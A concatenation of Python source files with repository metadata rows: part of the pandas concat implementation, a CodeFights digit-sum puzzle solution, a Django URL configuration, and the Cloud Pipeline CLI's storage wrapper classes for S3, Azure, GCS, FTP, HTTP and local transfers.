raise TypeError(msg)
obj._consolidate(inplace=True)
ndims.add(obj.ndim)
sample = None
if len(ndims) > 1:
max_ndim = max(ndims)
for obj in objs:
if obj.ndim == max_ndim and np.sum(obj.shape):
sample = obj
break
else:
non_empties = [obj for obj in objs
if sum(obj.shape) > 0 or isinstance(obj, Series)]
if (len(non_empties) and (keys is None and names is None and
levels is None and
join_axes is None and
not self.intersect)):
objs = non_empties
sample = objs[0]
if sample is None:
sample = objs[0]
self.objs = objs
if isinstance(sample, Series):
axis = DataFrame._get_axis_number(axis)
else:
axis = sample._get_axis_number(axis)
self._is_frame = isinstance(sample, DataFrame)
if self._is_frame:
axis = 1 if axis == 0 else 0
self._is_series = isinstance(sample, Series)
if not 0 <= axis <= sample.ndim:
raise AssertionError("axis must be between 0 and {ndim}, input was"
" {axis}".format(ndim=sample.ndim, axis=axis))
if len(ndims) > 1:
current_column = 0
max_ndim = sample.ndim
self.objs, objs = [], self.objs
for obj in objs:
ndim = obj.ndim
if ndim == max_ndim:
pass
elif ndim != max_ndim - 1:
raise ValueError("cannot concatenate unaligned mixed "
"dimensional NDFrame objects")
else:
name = getattr(obj, 'name', None)
if ignore_index or name is None:
name = current_column
current_column += 1
if self._is_frame and axis == 1:
name = 0
obj = sample._constructor({name: obj})
self.objs.append(obj)
self.axis = axis
self.join_axes = join_axes
self.keys = keys
self.names = names or getattr(keys, 'names', None)
self.levels = levels
self.sort = sort
self.ignore_index = ignore_index
self.verify_integrity = verify_integrity
self.copy = copy
self.new_axes = self._get_new_axes()
def get_result(self):
if self._is_series:
if self.axis == 0:
name = com.consensus_name_attr(self.objs)
mgr = self.objs[0]._data.concat([x._data for x in self.objs],
self.new_axes)
cons = _concat._get_series_result_type(mgr, self.objs)
return cons(mgr, name=name).__finalize__(self, method='concat')
else:
data = dict(zip(range(len(self.objs)), self.objs))
cons = _concat._get_series_result_type(data)
index, columns = self.new_axes
df = cons(data, index=index)
df.columns = columns
return df.__finalize__(self, method='concat')
else:
mgrs_indexers = []
for obj in self.objs:
mgr = obj._data
indexers = {}
for ax, new_labels in enumerate(self.new_axes):
if ax == self.axis:
continue
obj_labels = mgr.axes[ax]
if not new_labels.equals(obj_labels):
indexers[ax] = obj_labels.reindex(new_labels)[1]
mgrs_indexers.append((obj._data, indexers))
new_data = concatenate_block_managers(
mgrs_indexers, self.new_axes, concat_axis=self.axis,
copy=self.copy)
if not self.copy:
new_data._consolidate_inplace()
cons = _concat._get_frame_result_type(new_data, self.objs)
return (cons._from_axes(new_data, self.new_axes)
.__finalize__(self, method='concat'))
def _get_result_dim(self):
if self._is_series and self.axis == 1:
return 2
else:
return self.objs[0].ndim
def _get_new_axes(self):
ndim = self._get_result_dim()
new_axes = [None] * ndim
if self.join_axes is None:
for i in range(ndim):
if i == self.axis:
continue
new_axes[i] = self._get_comb_axis(i)
else:
if len(self.join_axes) != ndim - 1:
raise AssertionError("length of join_axes must be equal "
"to {length}".format(length=ndim - 1))
indices = compat.lrange(ndim)
indices.remove(self.axis)
for i, ax in zip(indices, self.join_axes):
new_axes[i] = ax
new_axes[self.axis] = self._get_concat_axis()
return new_axes
def _get_comb_axis(self, i):
data_axis = self.objs[0]._get_block_manager_axis(i)
try:
return _get_objs_combined_axis(self.objs, axis=data_axis,
intersect=self.intersect,
sort=self.sort)
except IndexError:
types = [type(x).__name__ for x in self.objs]
raise TypeError("Cannot concatenate list of {types}"
.format(types=types))
def _get_concat_axis(self):
if self._is_series:
if self.axis == 0:
indexes = [x.index for x in self.objs]
elif self.ignore_index:
idx = ibase.default_index(len(self.objs))
return idx
elif self.keys is None:
names = [None] * len(self.objs)
num = 0
has_names = False
for i, x in enumerate(self.objs):
if not isinstance(x, Series):
raise TypeError("Cannot concatenate type 'Series' "
"with object of type {type!r}"
.format(type=type(x).__name__))
if x.name is not None:
names[i] = x.name
has_names = True
else:
names[i] = num
num += 1
if has_names:
return Index(names)
else:
return ibase.default_index(len(self.objs))
else:
return ensure_index(self.keys).set_names(self.names)
else:
indexes = [x._data.axes[self.axis] for x in self.objs]
if self.ignore_index:
idx = ibase.default_index(sum(len(i) for i in indexes))
return idx
if self.keys is None:
concat_axis = _concat_indexes(indexes)
else:
concat_axis = _make_concat_multiindex(indexes, self.keys,
self.levels, self.names)
self._maybe_check_integrity(concat_axis)
return concat_axis
def _maybe_check_integrity(self, concat_index):
if self.verify_integrity:
if not concat_index.is_unique:
overlap = concat_index[concat_index.duplicated()].unique()
raise ValueError('Indexes have overlapping values: '
'{overlap!s}'.format(overlap=overlap))
def _concat_indexes(indexes):
return indexes[0].append(indexes[1:])
def _make_concat_multiindex(indexes, keys, levels=None, names=None):
if ((levels is None and isinstance(keys[0], tuple)) or
(levels is not None and len(levels) > 1)):
zipped = compat.lzip(*keys)
if names is None:
names = [None] * len(zipped)
if levels is None:
_, levels = _factorize_from_iterables(zipped)
else:
levels = [ensure_index(x) for x in levels]
else:
zipped = [keys]
if names is None:
names = [None]
if levels is None:
levels = [ensure_index(keys)]
else:
levels = [ensure_index(x) for x in levels]
if not _all_indexes_same(indexes):
codes_list = []
for hlevel, level in zip(zipped, levels):
to_concat = []
for key, index in zip(hlevel, indexes):
try:
i = level.get_loc(key)
except KeyError:
raise ValueError('Key {key!s} not in level {level!s}'
.format(key=key, level=level))
to_concat.append(np.repeat(i, len(index)))
codes_list.append(np.concatenate(to_concat))
concat_index = _concat_indexes(indexes)
if isinstance(concat_index, MultiIndex):
levels.extend(concat_index.levels)
codes_list.extend(concat_index.codes)
else:
codes, categories = _factorize_from_iterable(concat_index)
levels.append(categories)
codes_list.append(codes)
if len(names) == len(levels):
names = list(names)
else:
if not len({idx.nlevels for idx in indexes}) == 1:
raise AssertionError("Cannot concat indices that do"
" not have the same number of levels")
names = names + _get_consensus_names(indexes)
return MultiIndex(levels=levels, codes=codes_list, names=names,
verify_integrity=False)
new_index = indexes[0]
n = len(new_index)
kpieces = len(indexes)
new_names = list(names)
new_levels = list(levels)
new_codes = []
for hlevel, level in zip(zipped, levels):
hlevel = ensure_index(hlevel)
mapped = level.get_indexer(hlevel)
mask = mapped == -1
if mask.any():
raise ValueError('Values not found in passed level: {hlevel!s}'
.format(hlevel=hlevel[mask]))
new_codes.append(np.repeat(mapped, n))
if isinstance(new_index, MultiIndex):
new_levels.extend(new_index.levels)
new_codes.extend([np.tile(lab, kpieces) for lab in new_index.codes])
else:
new_levels.append(new_index)
new_codes.append(np.tile(np.arange(n), kpieces))
if len(new_names) < len(new_levels):
new_names.extend(new_index.names)
return MultiIndex(levels=new_levels, codes=new_codes, names=new_names,
verify_integrity=False)
| true | true |
1c2c9846bb530c6a7db2bfeffeaf52ece44cd30d | 1,050 | py | Python | arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/047_ComfortableNumbers.py | netor27/codefights-arcade-solutions | 69701ab06d45902c79ec9221137f90b75969d8c8 | [
"MIT"
] | null | null | null | arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/047_ComfortableNumbers.py | netor27/codefights-arcade-solutions | 69701ab06d45902c79ec9221137f90b75969d8c8 | [
"MIT"
] | null | null | null | arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/047_ComfortableNumbers.py | netor27/codefights-arcade-solutions | 69701ab06d45902c79ec9221137f90b75969d8c8 | [
"MIT"
] | null | null | null | def comfortableNumbers(l, r):
'''
Let's say that number a feels comfortable with number b if a ≠ b and b lies in the segment [a - s(a), a + s(a)], where s(x) is the sum of x's digits.
How many pairs (a, b) are there, such that a < b, both a and b lie on the segment [l, r], and each number feels comfortable with the other?
Example
For l = 10 and r = 12, the output should be
comfortableNumbers(l, r) = 2.
Here are all values of s(x) to consider:
s(10) = 1, so 10 is comfortable with 9 and 11;
s(11) = 2, so 11 is comfortable with 9, 10, 12 and 13;
s(12) = 3, so 12 is comfortable with 9, 10, 11, 13, 14 and 15.
Thus, there are 2 pairs of numbers comfortable with each other within the segment [10; 12]: (10, 11) and (11, 12).
'''
result = 0
for a in range(l, r):
sa = sumOfDigits(a)
for b in range(a + 1, min(r + 1, a + sa + 1)):
sb = sumOfDigits(b)
if b - a <= sb:
result += 1
return result
def sumOfDigits(n):
return sum([int(i) for i in str(n)])
| 32.8125 | 153 | 0.599048 | def comfortableNumbers(l, r):
result = 0
for a in range(l, r):
sa = sumOfDigits(a)
for b in range(a + 1, min(r + 1, a + sa + 1)):
sb = sumOfDigits(b)
if b - a <= sb:
result += 1
return result
def sumOfDigits(n):
return sum([int(i) for i in str(n)])
| true | true |
1c2c98cf381d25134cbbe5eeac3bcfb00b4e0d3a | 608 | py | Python | rank/urls.py | shvedovskiy/web_technopolis | 430d7e74fb87870e369ca615294116c63a51ff25 | [
"WTFPL"
] | null | null | null | rank/urls.py | shvedovskiy/web_technopolis | 430d7e74fb87870e369ca615294116c63a51ff25 | [
"WTFPL"
] | 1 | 2016-12-02T17:02:23.000Z | 2016-12-02T17:02:23.000Z | rank/urls.py | shvedovskiy/web_technopolis | 430d7e74fb87870e369ca615294116c63a51ff25 | [
"WTFPL"
] | null | null | null | from django.conf.urls import url
from . import views
app_name = 'rank'
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^about/$', views.about, name='about'),
url(r'^add_category', views.add_category, name='add_category'),
url(r'^category/(?P<category_name_slug>[\w\-]+)/$', views.category, name='category'),
url(r'^category/(?P<category_name_slug>[\w\-]+)/add_page/$', views.add_page, name='add_page'),
url(r'^register/$', views.register, name='register'),
url(r'^login/$', views.user_login, name='login'),
url(r'^logout/$', views.user_logout, name='logout'),
]
| 40.533333 | 98 | 0.646382 | from django.conf.urls import url
from . import views
app_name = 'rank'
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^about/$', views.about, name='about'),
url(r'^add_category', views.add_category, name='add_category'),
url(r'^category/(?P<category_name_slug>[\w\-]+)/$', views.category, name='category'),
url(r'^category/(?P<category_name_slug>[\w\-]+)/add_page/$', views.add_page, name='add_page'),
url(r'^register/$', views.register, name='register'),
url(r'^login/$', views.user_login, name='login'),
url(r'^logout/$', views.user_logout, name='logout'),
]
| true | true |
1c2c99328ec43c52455f8910f49b6adb1e526a0d | 26,618 | py | Python | pipe-cli/src/model/data_storage_wrapper.py | AlfiyaRF/cloud-pipeline | 532c02a7e88928f42b28be87545aab93db404df5 | [
"Apache-2.0"
] | null | null | null | pipe-cli/src/model/data_storage_wrapper.py | AlfiyaRF/cloud-pipeline | 532c02a7e88928f42b28be87545aab93db404df5 | [
"Apache-2.0"
] | null | null | null | pipe-cli/src/model/data_storage_wrapper.py | AlfiyaRF/cloud-pipeline | 532c02a7e88928f42b28be87545aab93db404df5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017-2019 EPAM Systems, Inc. (https://www.epam.com/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import abstractmethod, ABCMeta
from ftplib import FTP, error_temp
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse
import click
import requests
import sys
from ..api.data_storage import DataStorage
from ..config import ConfigNotFoundError
from ..utilities.storage.s3 import S3BucketOperations
from ..utilities.storage.local import LocalOperations
from ..utilities.storage.azure import AzureListingManager, AzureDeleteManager, AzureBucketOperations
from ..utilities.storage.gs import GsRestoreManager, GsListingManager, GsDeleteManager, GsBucketOperations
from ..utilities.storage.common import StorageOperations
from .data_storage_wrapper_type import WrapperType
import shutil
from bs4 import BeautifulSoup, SoupStrainer
import posixpath
FILE = 'File'
FOLDER = 'Folder'
class AllowedSymlinkValues(object):
FOLLOW = 'follow'
SKIP = 'skip'
FILTER = 'filter'
class DataStorageWrapper(object):
_transfer_manager_suppliers = {
(WrapperType.S3, WrapperType.S3): S3BucketOperations.get_transfer_between_buckets_manager,
(WrapperType.S3, WrapperType.LOCAL): S3BucketOperations.get_download_manager,
(WrapperType.LOCAL, WrapperType.S3): S3BucketOperations.get_upload_manager,
(WrapperType.FTP, WrapperType.S3): S3BucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.HTTP, WrapperType.S3): S3BucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.AZURE, WrapperType.AZURE): AzureBucketOperations.get_transfer_between_buckets_manager,
(WrapperType.AZURE, WrapperType.LOCAL): AzureBucketOperations.get_download_manager,
(WrapperType.LOCAL, WrapperType.AZURE): AzureBucketOperations.get_upload_manager,
(WrapperType.FTP, WrapperType.AZURE): AzureBucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.HTTP, WrapperType.AZURE): AzureBucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.GS, WrapperType.GS): GsBucketOperations.get_transfer_between_buckets_manager,
(WrapperType.GS, WrapperType.LOCAL): GsBucketOperations.get_download_manager,
(WrapperType.LOCAL, WrapperType.GS): GsBucketOperations.get_upload_manager,
(WrapperType.FTP, WrapperType.GS): GsBucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.HTTP, WrapperType.GS): GsBucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.FTP, WrapperType.LOCAL): LocalOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.HTTP, WrapperType.LOCAL): LocalOperations.get_transfer_from_http_or_ftp_manager
}
def __init__(self, path):
self.path = path
self.items = []
self.path_separator = StorageOperations.PATH_SEPARATOR
@classmethod
def get_wrapper(cls, uri, symlinks=None):
parsed = urlparse(uri)
if not parsed.scheme or not parsed.netloc:
return LocalFileSystemWrapper(uri, symlinks)
if parsed.scheme.lower() == 'ftp' or parsed.scheme.lower() == 'ftps':
return HttpSourceWrapper(uri) if os.getenv("ftp_proxy") \
else FtpSourceWrapper(parsed.scheme, parsed.netloc, parsed.path, uri)
if parsed.scheme.lower() == 'http' or parsed.scheme.lower() == 'https':
return HttpSourceWrapper(uri)
else:
return cls.get_cloud_wrapper(uri)
@classmethod
def get_cloud_wrapper(cls, uri, versioning=False):
root_bucket, original_path, _ = DataStorage.load_from_uri(uri)
relative_path = original_path if original_path != '/' else ''
return cls.__get_storage_wrapper(root_bucket, relative_path, versioning=versioning)
@classmethod
def get_cloud_wrapper_for_bucket(cls, bucket_model, relative_path):
return cls.__get_storage_wrapper(bucket_model, relative_path, init=False)
@classmethod
def __get_storage_wrapper(cls, bucket, relative_path, *args, **kwargs):
_suppliers = {
WrapperType.S3: S3BucketWrapper.build_wrapper,
WrapperType.AZURE: AzureBucketWrapper.build_wrapper,
WrapperType.GS: GsBucketWrapper.build_wrapper,
}
if bucket.type in _suppliers:
supplier = _suppliers[bucket.type]
return supplier(bucket, relative_path, *args, **kwargs)
else:
raise RuntimeError('There is no data storage wrapper for %s storage type.' % bucket.type)
@classmethod
def get_operation_manager(cls, source_wrapper, destination_wrapper, command):
manager_types = source_wrapper.get_type(), destination_wrapper.get_type()
if manager_types in DataStorageWrapper._transfer_manager_suppliers:
supplier = DataStorageWrapper._transfer_manager_suppliers[manager_types]
return supplier(source_wrapper, destination_wrapper, command)
else:
raise RuntimeError('Transferring files between the following storage types %s -> %s is not supported.'
% manager_types)
@classmethod
def get_data_storage_item_path_info(cls, path, buckets=None):
error = None
if buckets is None or len(buckets) == 0:
buckets = []
try:
buckets = list(DataStorage.list())
except ConfigNotFoundError as config_not_found_error:
error = str(config_not_found_error)
except requests.exceptions.RequestException as http_error:
error = 'Http error: {}'.format(str(http_error))
except RuntimeError as runtime_error:
error = 'Error: {}'.format(str(runtime_error))
except ValueError as value_error:
error = 'Error: {}'.format(str(value_error))
if error:
return error, None, None, None
url = urlparse(path)
if url.scheme.lower() not in WrapperType.cloud_schemes():
return "'%s' scheme is not supported" % url.scheme, None, None, None
parts = url.path.split('/')
current_bucket = None
for bucket_model in buckets:
if bucket_model.path is not None \
and bucket_model.type in WrapperType.cloud_types() \
and path.startswith(bucket_model.path.lower()):
if current_bucket is None or len(bucket_model.path) > len(current_bucket.path):
current_bucket = bucket_model
break
if current_bucket is None:
return 'Storage \'{}\' was not found'.format(path), None, None, None
delimiter = '/'
if current_bucket.delimiter is not None:
delimiter = current_bucket.delimiter
relative_path = url.path
item_type = FILE
if len(parts[len(parts) - 1].split('.')) == 1:
item_type = FOLDER
return None, current_bucket.identifier, relative_path, item_type, delimiter
def get_type(self):
return None
def is_file(self):
return False
def exists(self):
return False
def is_empty(self, relative=None):
return False
def is_local(self):
return self.get_type() == WrapperType.LOCAL
def fetch_items(self):
self.items = self.get_items()
def get_items(self):
return []
def get_folders_list(self):
return map(lambda i: (i[1], i[2]), [item for item in self.items if item[0] == FOLDER])
def get_files_list(self):
return map(lambda i: (i[1], i[2]), [item for item in self.items if item[0] == FILE])
def create_folder(self, relative_path):
pass
def download_file(self, source_uri, relative_path):
pass
def download_single_file(self, source_uri, relative_path):
pass
def get_file_download_uri(self, relative_path):
return None
def delete_item(self, relative_path):
pass
def path_with_trailing_separator(self):
return self.path \
if self.path.endswith(self.path_separator) \
else self.path + self.path_separator
class CloudDataStorageWrapper(DataStorageWrapper):
__metaclass__ = ABCMeta
def __init__(self, bucket, path):
super(CloudDataStorageWrapper, self).__init__(path)
self.bucket = bucket
self.is_file_flag = False
self.exists_flag = False
# case when the root bucket folder is passed
if len(path) == 0 and self.bucket.identifier:
self.exists_flag = True
self.is_file_flag = False
def is_file(self):
return self.is_file_flag
def exists(self):
return self.exists_flag
def get_items(self):
return self.get_list_manager().get_items(self.path)
def is_empty(self, relative=None):
if not self.exists():
return True
if self.is_file():
return False
if relative:
delimiter = StorageOperations.PATH_SEPARATOR
path = self.path.rstrip(delimiter) + delimiter + relative
else:
path = self.path
return not self.get_list_manager().folder_exists(path)
@abstractmethod
def get_type(self):
pass
@abstractmethod
def get_restore_manager(self):
pass
@abstractmethod
def get_list_manager(self, show_versions=False):
pass
@abstractmethod
def get_delete_manager(self, versioning):
pass
class S3BucketWrapper(CloudDataStorageWrapper):
def __init__(self, bucket, path):
super(S3BucketWrapper, self).__init__(bucket, path)
# parse root bucket from path
self.bucket.path = bucket.path.split(self.path_separator)[0]
self.is_empty_flag = True
self.session = None
@classmethod
def build_wrapper(cls, root_bucket, relative_path, init=True, *args, **kwargs):
wrapper = S3BucketWrapper(root_bucket, relative_path)
if init:
S3BucketOperations.init_wrapper(wrapper, *args, **kwargs)
return wrapper
def get_type(self):
return WrapperType.S3
def is_empty(self, relative=None):
if not self.exists():
return True
if self.is_file():
return False
if not self.is_empty_flag and relative:
return not S3BucketOperations.path_exists(self, relative, session=self.session)
return self.is_empty_flag
def get_file_download_uri(self, relative_path):
download_url_model = DataStorage.generate_download_url(self.bucket.identifier, relative_path)
if download_url_model is not None:
return download_url_model.url
return None
def delete_item(self, relative_path):
S3BucketOperations.delete_item(self, relative_path, session=self.session)
def get_restore_manager(self):
return S3BucketOperations.get_restore_manager(self)
def get_list_manager(self, show_versions=False):
return S3BucketOperations.get_list_manager(self, show_versions=show_versions)
def get_delete_manager(self, versioning):
return S3BucketOperations.get_delete_manager(self, versioning)
class AzureBucketWrapper(CloudDataStorageWrapper):
def __init__(self, bucket, path):
super(AzureBucketWrapper, self).__init__(bucket, path)
self.service = None
@classmethod
def build_wrapper(cls, root_bucket, relative_path, versioning=False, init=True):
if versioning:
raise RuntimeError('Versioning is not supported by AZURE cloud provider')
wrapper = AzureBucketWrapper(root_bucket, relative_path)
if init:
StorageOperations.init_wrapper(wrapper, versioning=versioning)
return wrapper
def get_type(self):
return WrapperType.AZURE
def get_restore_manager(self):
raise RuntimeError('Versioning is not supported by AZURE cloud provider')
def get_list_manager(self, show_versions=False):
if show_versions:
raise RuntimeError('Versioning is not supported by AZURE cloud provider')
return AzureListingManager(self._blob_service(read=True, write=False), self.bucket)
def get_delete_manager(self, versioning):
if versioning:
raise RuntimeError('Versioning is not supported by AZURE cloud provider')
return AzureDeleteManager(self._blob_service(read=True, write=True), self.bucket)
def _blob_service(self, read, write):
if write or not self.service:
self.service = AzureBucketOperations.get_blob_service(self.bucket, read, write)
return self.service
class GsBucketWrapper(CloudDataStorageWrapper):
@classmethod
def build_wrapper(cls, root_bucket, relative_path, init=True, *args, **kwargs):
wrapper = GsBucketWrapper(root_bucket, relative_path)
if init:
StorageOperations.init_wrapper(wrapper, *args, **kwargs)
return wrapper
def get_type(self):
return WrapperType.GS
def get_restore_manager(self):
return GsRestoreManager(self._storage_client(write=True, versioning=True), self)
def get_list_manager(self, show_versions=False):
return GsListingManager(self._storage_client(versioning=show_versions), self.bucket, show_versions)
def get_delete_manager(self, versioning):
return GsDeleteManager(self._storage_client(write=True, versioning=versioning), self.bucket)
def _storage_client(self, read=True, write=False, versioning=False):
return GsBucketOperations.get_client(self.bucket, read=read, write=write, versioning=versioning)
class LocalFileSystemWrapper(DataStorageWrapper):
def __init__(self, path, symlinks=None):
super(LocalFileSystemWrapper, self).__init__(path)
if self.path == ".":
self.path = "./"
if self.path.startswith("~"):
self.path = os.path.join(os.path.expanduser('~'), self.path.strip("~/"))
self.symlinks = symlinks
self.path_separator = os.sep
def exists(self):
return os.path.exists(self.path)
def is_file(self):
return os.path.isfile(self.path)
def get_type(self):
return WrapperType.LOCAL
def is_empty(self, relative=None):
if not self.exists():
return True
if self.is_file():
return False
if relative:
return not os.path.exists(os.path.join(self.path, relative))
return not os.listdir(self.path)
def get_items(self):
def leaf_path(source_path):
head, tail = os.path.split(source_path)
return tail or os.path.basename(head)
self.path = os.path.abspath(self.path)
if os.path.isfile(self.path):
if os.path.islink(self.path) and self.symlinks == AllowedSymlinkValues.SKIP:
return []
return [(FILE, self.path, leaf_path(self.path), os.path.getsize(self.path))]
else:
result = list()
visited_symlinks = set()
def list_items(path, parent, symlinks, visited_symlinks, root=False):
for item in os.listdir(path):
absolute_path = os.path.join(path, item)
symlink_target = None
if os.path.islink(absolute_path) and symlinks != AllowedSymlinkValues.FOLLOW:
if symlinks == AllowedSymlinkValues.SKIP:
continue
if symlinks == AllowedSymlinkValues.FILTER:
symlink_target = os.readlink(absolute_path)
if symlink_target in visited_symlinks:
continue
else:
visited_symlinks.add(symlink_target)
relative_path = item
if not root and parent is not None:
relative_path = os.path.join(parent, item)
if os.path.isfile(absolute_path):
result.append((FILE, absolute_path, relative_path, os.path.getsize(absolute_path)))
elif os.path.isdir(absolute_path):
list_items(absolute_path, relative_path, symlinks, visited_symlinks)
if symlink_target and os.path.islink(path) and symlink_target in visited_symlinks:
visited_symlinks.remove(symlink_target)
list_items(self.path, leaf_path(self.path), self.symlinks, visited_symlinks, root=True)
return result
def create_folder(self, relative_path):
absolute_path = os.path.join(self.path, relative_path)
if os.path.isfile(absolute_path):
return 'Error creating folder {}: a file with the same name already exists'.format(relative_path)
if not os.path.isdir(absolute_path):
os.makedirs(absolute_path)
return None
def download_single_file(self, source_uri, relative_path):
if source_uri is None:
click.echo('Download uri is empty for file {}'.format(relative_path), err=True)
sys.exit(1)
folder, file_name = os.path.split(self.path)
file_name = file_name or relative_path
full_path = os.path.join(folder, file_name)
if not os.path.isdir(folder):
os.makedirs(folder)
if os.path.isdir(full_path):
click.echo('Error copying file to \'{}\': a directory with the same name already exists'.format(full_path),
err=True)
sys.exit(1)
r = requests.get(source_uri, stream=True)
content_length = None
if 'content-length' in r.headers:
content_length = int(r.headers['content-length'])
if content_length is None:
click.echo('{}...'.format(relative_path), nl=False)
with open(full_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
click.echo('done.')
else:
estimated_bytes = content_length
click.echo('{}:'.format(relative_path))
with click.progressbar(length=content_length,
show_eta=False,
label=relative_path,
bar_template='[%(bar)s] %(info)s %(label)s') as progress_bar:
with open(full_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
if len(chunk) > 0:
estimated_bytes -= len(chunk)
progress_bar.update(len(chunk))
progress_bar.update(estimated_bytes)
pass
def download_file(self, source_uri, relative_path):
if source_uri is None:
click.echo('Download uri is empty for file {}'.format(relative_path), err=True)
sys.exit(1)
r = requests.get(source_uri, stream=True)
content_length = None
if 'content-length' in r.headers:
content_length = int(r.headers['content-length'])
if content_length is None:
click.echo('{}...'.format(relative_path), nl=False)
with open(os.path.join(self.path, relative_path), 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
click.echo('done.')
else:
estimated_bytes = content_length
with click.progressbar(length=content_length,
show_eta=False,
label=relative_path,
bar_template='[%(bar)s] %(info)s %(label)s') as progress_bar:
with open(os.path.join(self.path, relative_path), 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
if len(chunk) > 0:
estimated_bytes -= len(chunk)
progress_bar.update(len(chunk))
progress_bar.update(estimated_bytes)
def delete_item(self, relative_path):
path = os.path.join(self.path, relative_path)
if os.path.isfile(path) and os.path.exists(path):
os.remove(path)
else:
shutil.rmtree(path, ignore_errors=True)
class FtpSourceWrapper(DataStorageWrapper):
def __init__(self, scheme, netloc, relative_path, url):
super(FtpSourceWrapper, self).__init__(url)
self.is_file_flag = False
self.exists_flag = False
self.relative_path = relative_path
self.host = netloc
self.scheme = scheme
self.ftp = FTP(netloc)
self.ftp.login()
def get_type(self):
return WrapperType.FTP
def exists(self):
try:
self.ftp.nlst(self.relative_path)
self.exists_flag = True
return True
except error_temp:
self.exists_flag = False
return False
def is_file(self):
self.is_file_flag = len(self.ftp.nlst(self.relative_path)) == 1
return self.is_file_flag
def get_items(self):
return self._get_files([], self.relative_path)
def _get_files(self, files, path):
remote_files = self.ftp.nlst(path)
if len(remote_files) == 1:
self.ftp.voidcmd('TYPE I') # change ftp connection to binary mode to get file size
files.append((FILE, "%s://%s%s" % (self.scheme, self.host, path),
self._get_relative_path(path).strip("/"), self.ftp.size(path)))
else:
for file_path in remote_files:
self._get_files(files, file_path)
return files
def _get_relative_path(self, path):
if self.relative_path == path:
return os.path.basename(path)
else:
return path[len(self.relative_path):]
class HttpSourceWrapper(DataStorageWrapper):
def __init__(self, url):
super(HttpSourceWrapper, self).__init__(url)
self.host = urlparse(url).netloc
self.is_file_flag = False
self.exists_flag = False
self.ftp_proxy_session = None
if os.getenv("ftp_proxy"):
self.ftp_proxy_session = requests.Session()
self.ftp_proxy_session.mount('ftp://', requests.adapters.HTTPAdapter())
def get_type(self):
return WrapperType.HTTP
def exists(self):
head = self._head(self.path)
self.exists_flag = head.status_code == 200
return self.exists_flag
def is_file(self):
self.is_file_flag = self._is_downloadable()
return self.is_file_flag
def get_items(self):
return self._get_files(self.path, [], [])
def _head(self, path):
return self.ftp_proxy_session.head(path) if self.ftp_proxy_session \
else requests.head(path, allow_redirects=True)
def _get(self, path):
return self.ftp_proxy_session.get(path) if self.ftp_proxy_session else requests.get(path)
def _is_downloadable(self):
"""
Does the url contain a downloadable resource
"""
head = self._head(self.path)
header = head.headers
content_type = header.get('content-type')
return content_type is None or 'html' not in content_type.lower()
def _get_files(self, path, files, processed_paths):
if path in processed_paths:
return files
processed_paths.append(path)
if self._is_downloadable():
head = self._head(path)
content_length = head.headers.get('Content-Length')
files.append((FILE, str(path), self._get_relative_path(path).strip("/"),
content_length if content_length is None else int(content_length)))
else:
response = self._get(path)
soup = BeautifulSoup(response.content, "html.parser", parse_only=SoupStrainer('a'))
page_paths = set([link['href'] for link in soup.findAll('a', href=True)])
for page_path in page_paths:
current_host = urlparse(page_path).netloc
if current_host:
if page_path in processed_paths:
continue
if current_host != self.host:
processed_paths.append(page_path)
continue
head = self._head(page_path)
if head.status_code == 200:
self._get_files(page_path, files, processed_paths)
else:
parsed = urlparse(path)
normalized_path = "%s://%s%s" % (parsed.scheme, parsed.netloc,
posixpath.normpath(os.path.join(parsed.path, page_path)))
if normalized_path in processed_paths:
continue
if not normalized_path.startswith(self.path):
processed_paths.append(normalized_path)
continue
head = self._head(normalized_path)
if head.status_code == 200:
self._get_files(normalized_path, files, processed_paths)
else:
processed_paths.append(normalized_path)
return files
def _get_relative_path(self, path):
if self.path == path:
return os.path.basename(path)
else:
return path[len(self.path):]
| 39.787743 | 119 | 0.63164 |
import os
from abc import abstractmethod, ABCMeta
from ftplib import FTP, error_temp
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse
import click
import requests
import sys
from ..api.data_storage import DataStorage
from ..config import ConfigNotFoundError
from ..utilities.storage.s3 import S3BucketOperations
from ..utilities.storage.local import LocalOperations
from ..utilities.storage.azure import AzureListingManager, AzureDeleteManager, AzureBucketOperations
from ..utilities.storage.gs import GsRestoreManager, GsListingManager, GsDeleteManager, GsBucketOperations
from ..utilities.storage.common import StorageOperations
from .data_storage_wrapper_type import WrapperType
import shutil
from bs4 import BeautifulSoup, SoupStrainer
import posixpath
FILE = 'File'
FOLDER = 'Folder'
class AllowedSymlinkValues(object):
FOLLOW = 'follow'
SKIP = 'skip'
FILTER = 'filter'
class DataStorageWrapper(object):
_transfer_manager_suppliers = {
(WrapperType.S3, WrapperType.S3): S3BucketOperations.get_transfer_between_buckets_manager,
(WrapperType.S3, WrapperType.LOCAL): S3BucketOperations.get_download_manager,
(WrapperType.LOCAL, WrapperType.S3): S3BucketOperations.get_upload_manager,
(WrapperType.FTP, WrapperType.S3): S3BucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.HTTP, WrapperType.S3): S3BucketOperations.get_transfer_from_http_or_ftp_manager,
